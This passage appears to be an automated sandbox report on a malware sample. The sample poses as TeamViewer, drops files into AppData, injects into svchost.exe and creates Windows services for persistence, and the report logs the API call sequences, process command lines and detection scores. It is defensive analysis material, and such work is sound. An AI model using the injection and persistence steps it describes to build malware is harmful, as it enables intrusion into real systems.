Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 3_2_6F338510
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F338400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache, 3_2_6F338400
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33B270 NtResumeThread,NtClose,HeapFree, 3_2_6F33B270
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33B1F0 NtSuspendThread,NtClose, 3_2_6F33B1F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 3_2_6F33B0A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33AE20 NtOpenThread, 3_2_6F33AE20
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F334EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,wsprintfA,CloseHandle,CloseHandle,CloseHandle, 3_2_6F334EF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F332ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 3_2_6F332ED0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33AD39 NtProtectVirtualMemory, 3_2_6F33AD39
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F331C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory, 3_2_6F331C00
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F3319F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree, 3_2_6F3319F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F3318D0 NtProtectVirtualMemory, 3_2_6F3318D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F332750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree, 3_2_6F332750
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F332640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose, 3_2_6F332640
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33A500 NtQueryVirtualMemory, 3_2_6F33A500
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F3314E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory, 3_2_6F3314E0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F3323B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess, 3_2_6F3323B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33B2D0 RtlMoveMemory,NtFlushInstructionCache, 3_2_6F33B2D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,wsprintfA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 6_2_6F338510
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33AD39 NtProtectVirtualMemory, 6_2_6F33AD39
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33A500 NtQueryVirtualMemory, 6_2_6F33A500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F332750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree, 6_2_6F332750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F336D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree, 6_2_6F336D50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F3323B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess, 6_2_6F3323B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F337790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW, 6_2_6F337790
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F3319F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree, 6_2_6F3319F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33B1F0 NtSuspendThread,NtClose, 6_2_6F33B1F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33ADE0 NtProtectVirtualMemory, 6_2_6F33ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33AFC0 NtGetContextThread,NtSetContextThread, 6_2_6F33AFC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33AE20 NtOpenThread, 6_2_6F33AE20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F338400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache, 6_2_6F338400
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F331C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory, 6_2_6F331C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33B270 NtResumeThread,NtClose,HeapFree, 6_2_6F33B270
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F332640 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose, 6_2_6F332640
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 6_2_6F33B0A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F334EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle, 6_2_6F334EF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F3314E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory, 6_2_6F3314E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33B2D0 RtlMoveMemory,NtFlushInstructionCache, 6_2_6F33B2D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F332ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 6_2_6F332ED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F3318D0 NtProtectVirtualMemory, 6_2_6F3318D0
PE file does not import any functions
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTeamViewer.exel& vs 77Etc0bR2v.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTeamViewer_Resource.dll\ vs 77Etc0bR2v.exe
PE file contains strange resources
Source: 77Etc0bR2v.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TeamViewer.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TeamViewer.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Contains functionality to delete services
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F333700 OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle, 2_2_6F333700
Source: 77Etc0bR2v.exe Virustotal: Detection: 37%
Source: 77Etc0bR2v.exe ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File read: C:\Users\user\Desktop\77Etc0bR2v.exe
Source: 77Etc0bR2v.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\Desktop\77Etc0bR2v.exe 'C:\Users\user\Desktop\77Etc0bR2v.exe'
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknown Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknown Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknown Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 2_2_6F335B40
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004C6E36 AdjustTokenPrivileges, 3_2_004C6E36
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 3_2_6F335B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 6_2_6F335B40
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File created: C:\Users\user\AppData\Roaming\TeamViewer
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File created: C:\Users\user\AppData\Local\Temp\nso5B2E.tmp
Source: nso5B2F.tmp.1.dr Binary string: Driver.GetDriverIPAddress.GetAdaptersInfo2.Error = Driver.GetDriverIPAddress.Memory allocation errorDriver.GetDriverIPAddress.GetAdaptersInfo.Error = Driver.NoSubkeys DriverConnector.GetGUIDfromRegistry: RegCloseKey(unit_key) failed with error DriverConnector.GetGUIDfromRegistry: RegQueryValueEx(component_id_string) failed with error DriverConnector.GetGUIDfromRegistry: RegQueryValueEx(net_cfg_instance_id_string) failed with error DriverConnector.GetGUIDfromRegistry: RegCloseKey(adapter_key) failed with error Driver.KeyError ComponentIdDriver.NoRegKey SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}DriverConnector.RemoveIPAddresses: DeleteIPAddress() failed with error DriverConnector.Close: CloseHandle failed\DEVICE\TCPIP_CDriverConnector::Init() GetIndex failed DriverConnector.Init: GetGUIDfromRegistry failedDriverConnector.Open: FlushIpNetTable failed with error DriverConnector.Open: IpRenewAddress failed with error Driver.Invalid.IPDriver.TAP_IOCTL_SET_MEDIA_STATUS.RejectedDriver.GetMAC.FailedDriver.DHCP.Failed1.0.0.7255.0.0.0DriverConnector.Open: DeviceIOControl(MTU) failedDriverConnector.Open: CreateFile failed with error \\.\Global\.dgt
Source: classification engine Classification label: mal76.evad.winEXE@14/11@4/4
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3329D0 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,VariantInit,VariantInit,lstrlenW,SysAllocStringLen,GetProcessHeap,HeapFree,PathQuoteSpacesW,VariantInit,SysAllocString,GetProcessHeap,HeapFree,VariantInit,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 2_2_6F3329D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle, 2_2_6F333C60
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle, 3_2_6F333C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle, 6_2_6F333C60
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolder,762AA680,lstrcmpi,lstrcat,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 1_2_00404356
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3396D0 SwitchDesktop,SetThreadDesktop,LoadLibraryA,GetProcessHeap,HeapAlloc,GetProcessHeap,RtlZeroMemory,GetSystemDirectoryA,PathAddBackslashA,lstrcatA,LoadLibraryExA,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep, 2_2_6F3396D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3337D0 QueryServiceConfigA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,ChangeServiceConfigA,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceA, 2_2_6F3337D0
